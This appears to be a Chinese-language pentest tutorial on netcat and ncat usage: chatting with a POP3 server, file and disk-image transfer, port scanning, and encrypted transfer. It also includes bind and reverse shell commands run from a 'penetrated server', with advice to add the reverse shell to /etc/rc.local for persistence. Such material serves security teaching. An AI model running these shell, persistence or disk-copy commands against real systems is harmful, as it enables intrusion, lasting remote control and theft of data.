經常使用且功能強大,安全從業者必不可少的幫手
網路工具中的瑞士軍刀——小身材、大智慧型
此時作為客戶端
nc -vn ip 埠
# v:顯示詳細連線資訊
連線163示例
# 計算163使用者名稱base64值
base64 # 回車
[email protected] # ctl+d
# 複製base64值
# 密碼同理
ping pop3.163.com # 檢視ip
nc -nv 220.181.12.110 110 # 連線
# 結果如下
# (unknown) [220.181.12.110] 110 (pop3) open
# +ok welcome to coremail mail pop3 server (163coms[10774b260cc7a37d26d71b52404dcf5cs])
user (賬戶base64值)
password (密碼base64值)
連線後即可對話
ls -l | nc -nv 10.1.1.1 333 # b
# 若要儲存到乙個檔案而不是顯示,a應輸入:
nc -l -p 333 . result.txt
# b:
ps aux | nc -nv 10.1.1.1 333 -q 1
# -q 1:等待1秒斷開連線
b傳給a:
a:
nc -lp 333 > 1.mp4
b:
nc -nv 1.1.1.1 333 < 1.mp4 -q 1
a傳給b:
a:
nc -q 1 -lp 333 < 1.mp4
b:
nc -nv 1.1.1.1 333 > 1.mp4
a傳給b
a:
tar -cvf - music/ | nc -lp 333 -q 1
b:
nc -nv 1.1.1.1 333 |
tar -xvf -
b傳給a
a:
nc -lp 333 | mcrypt --flush -fbqd -a rijndael-256 -m ecb > 1.mp4
b:
mcrypt --flush -fbq -a rijndael-256 -m ecb < a.mp4 | nc -nv 1.1.1.1 333 -q 1
cat 1.mp4 | nc -lp 333
b:
nc -nv 1.1.1.1 333 | mplayer -vo x11 -cache 3000 -
mplayer需要安裝
nc -nvz 1.1.1.1 1-65535
# 探測1-65535的埠狀態
遠端電子取證,可以將目標伺服器硬碟或記憶體遠端複製。
a從b裡取證
a:
nc -lp 333 |
dd of=/dev/sda
b:
dd if=/dev/sda | nc -nv 1.1.1.1 333 -q 1
a(伺服器端):
# 伺服器偵聽埠
nc -lp 333 -c bash
b(客戶端):
nc -nv 1.1.1.1 333
將自己的主機作為服務端
a(服務端,自己的主機):
# 偵聽埠
nc -lp 333
b(客戶端(滲透的伺服器)):
nc -nv 1.1.1.1 333 -c bash
# 可作為啟動指令碼寫入/etc/rc.local(開機啟動指令碼)
注意:如果需要控制windows需要將bash改為cmd
彌補nc的不足和缺陷
a(伺服器端 ip:1.1.1.1):
ncat -c bash --allow 1.1.1.2 -vnl 333 --ssl
# 只允許1.1.1.2連線
b(客戶端 ip:1.1.1.2):
ncat -nv 1.1.1.1 333 --ssl
注:不同系統/平台的nc引數功能不盡相同!!!此處為兩台kali實驗。
可通過nc -h,或man nc檢視引數使用方法
滲透測試筆記 之 recon ng
recon ngoptions list設定dns伺服器 options set nameserver 114.114.114.114設定 options set proxy 127.0.0.1 8889設定user agent 檢視工作區列表 載入工作區 刪除工作區 在terminal直接建立並啟...
安全測試之滲透測試筆記一
一.什麼是安全測試 滲透測試?滲透測試是模擬黑客進行網路攻擊,評估計算機網路安全的一種方法。這個過程包括對系統的任何弱點,技術缺陷或漏洞的主動分析 二.安全測試有什麼目的?1.髮型系統的安全漏洞 2.安全合規的要求 3.檢驗企業應對策略 三.電腦使用技巧及網路排錯命令 1.建議使用win10專業版,...
python之滲透測試筆記(一)
socket的例項化 socket family,type protocal s socket.socket 或s socket.socket socket.af inet,socket.sock stream s socket.socket socket.af inet,socket.sock d...